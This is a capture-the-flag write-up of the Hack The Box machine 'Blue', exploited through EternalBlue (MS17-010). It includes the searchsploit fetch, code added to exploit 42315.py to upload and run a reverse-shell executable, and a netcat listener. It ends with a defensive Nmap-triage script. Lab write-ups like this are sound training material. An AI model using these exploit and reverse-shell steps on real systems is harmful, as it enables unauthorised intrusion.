Road to OSCP : HTB Series : BLUE
On my road to OSCP certification, one of the common to-dos, as many before me have done in preparation for the exam, was to take on the retired machines available on the Hack in The Box (HTB) platform. It is a great platform for practicing and learning new penetration testing skills, as well as for taking on the challenge of “capturing the flag” on its machines.
In this HTB series, I will be sharing my write-ups on all the retired machines that I have attempted and will attempt. If you are wondering, “How does he know which machines to do to prepare for OSCP?” Well, I am using TjNull's list of OSCP-like boxes in HTB, which can be found here.
Now, without boring you with the details, let’s start!
The first box I will be walking through is a simple one, BLUE. An interesting fact about Blue is that it is one of those boxes where a single exploit will bring you to root. This should never happen in the real world, and it shows how this particular exploit (the clue is in its name) was eventually used as a vector for one of the famous ransomware strains, WannaCry.
To begin with this box, we first carry out our basic reconnaissance. For me, I used AutoRecon, which is developed and scripted by Tib3rius. It is one of the fundamental scans I run before moving on to more manual enumeration of specific ports or applications. After running AutoRecon, I checked the result of a quick nmap scan of the box.
We see there are really a lot of ports open for us to look at. While this may seem intimidating, with practice you will learn to look for common ports for common services first. In this case, I saw that ports 139 and 445 are open. This tells me that SMB is open here.
With this, I then run Nmap using the NSE scripts available:
Bingo. The NSE script picked up on an interesting RCE vulnerability! A quick bit of Google-fu on this CVE or the MS17-010 code will tell us that this is indeed the SMB vulnerability that EternalBlue exploits.
Using Searchsploit to search up the term EternalBlue:
We see that there are 3 options for us to choose from. Based on our initial reconnaissance, we know that our machine is probably Windows 7 or Windows Server 2008 R2. It is a good guess, but we still do not know for sure. To be on the safe side, I chose the 42315.py exploit. Grabbing that exploit with:
```
searchsploit -m windows/remote/42315.py
```
There is a Metasploit framework module that we could use but nope, let’s try this manually. First, we need to modify 42315.py as follows:
We modify the username by adding two backslashes so that we log in as guest, since guest login is enabled on the SMB service. We then modify the chunk of the Python script that carries out the execution of the exploit.
The original purpose of smb_pwn is to create a pwned.txt file on the target. However, we want to extend this to gain a shell. To do that we added the following code under the
```
smb_send_file(smbConn, "<path to your exploit.exe>", '$C', '/blue.exe')
service_exec(conn, r'cmd /c C:\\blue.exe')
```
In doing so, we utilise the smb_send_file function in the script to load a .exe file that we will craft, which when executed will give us a reverse shell on our listener. We then utilise the service_exec function in the script to execute the blue.exe we have loaded onto the machine.
Then, using msfvenom, we generate our malicious binary that will give a reverse shell when executed:
We then run the Python exploit 42315.py as follows, with another tab running nc -lvnp 4444
Checking on our listener after running the python exploit:
We have successfully obtained root and captured the root.txt flag!
Although this is an easy box, there are some things that we can learn from it. If you take the Metasploit Framework route, while it is really easy, you will lose the chance and the joy of learning how to read publicly available exploits and adapt them as you need.
It also highlights how important it is to secure any services or applications whose ports we expose to the wild, even more so if these services or applications are running with privileges, meaning root.
More about the mitigation for this vulnerability can be read here
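The same scan data serves the defensive side: the sketch below is an added example (not part of the original write-up) that triages Nmap XML output (`-oX`) into hosts with a confirmed MS17-010 finding, hosts that merely expose SMB, and the rest. It assumes the finding comes from the `smb-vuln-ms17-010` NSE script; the sample XML and addresses are constructed.

```python
import xml.etree.ElementTree as ET

# Constructed `nmap -oX` sample; addresses are documentation-range placeholders.
SAMPLE_XML = """<nmaprun>
<host><address addr="192.0.2.10" addrtype="ipv4"/>
 <ports>
  <port protocol="tcp" portid="139"><state state="open"/></port>
  <port protocol="tcp" portid="445"><state state="open"/></port>
 </ports>
 <hostscript><script id="smb-vuln-ms17-010"
   output="VULNERABLE: ms17-010&#10;  State: VULNERABLE&#10;  Risk factor: HIGH"/></hostscript>
</host>
<host><address addr="192.0.2.11" addrtype="ipv4"/>
 <ports>
  <port protocol="tcp" portid="445"><state state="open"/></port>
  <port protocol="tcp" portid="3389"><state state="closed"/></port>
 </ports>
</host>
<host><address addr="192.0.2.12" addrtype="ipv4"/>
 <ports><port protocol="tcp" portid="80"><state state="open"/></port></ports>
</host>
</nmaprun>"""

SMB_PORTS = {"139", "445"}

def triage(xml_text):
    """Map each IPv4 host to 'patch-now', 'smb-exposed' or 'ok'."""
    results = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        # Only ports nmap reported as open count as exposure.
        open_smb = [
            p.get("portid") for p in host.iter("port")
            if p.get("portid") in SMB_PORTS
            and p.find("state") is not None
            and p.find("state").get("state") == "open"
        ]
        # The NSE vuln report prints "State: VULNERABLE" for a confirmed finding.
        confirmed = any(
            s.get("id") == "smb-vuln-ms17-010"
            and "State: VULNERABLE" in s.get("output", "")
            for s in host.iter("script")
        )
        status = "patch-now" if confirmed else "smb-exposed" if open_smb else "ok"
        results[addr.get("addr")] = status
    return results

if __name__ == "__main__":
    for ip, status in triage(SAMPLE_XML).items():
        print(f"{ip}\t{status}")
```

Hosts reported as smb-exposed still deserve a look: an open 139/445 on an untrusted network is worth closing even when no vulnerability was confirmed.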
Thank you for reading! As always, if you enjoy these write-ups, subscribe to my publications or follow me on Twitter @lojomojo96 and hit me up with a DM! It will really encourage me to write and share even as I prepare for my OSCP certification. Of course, if there are points to improve in my own methodology, do let me know too!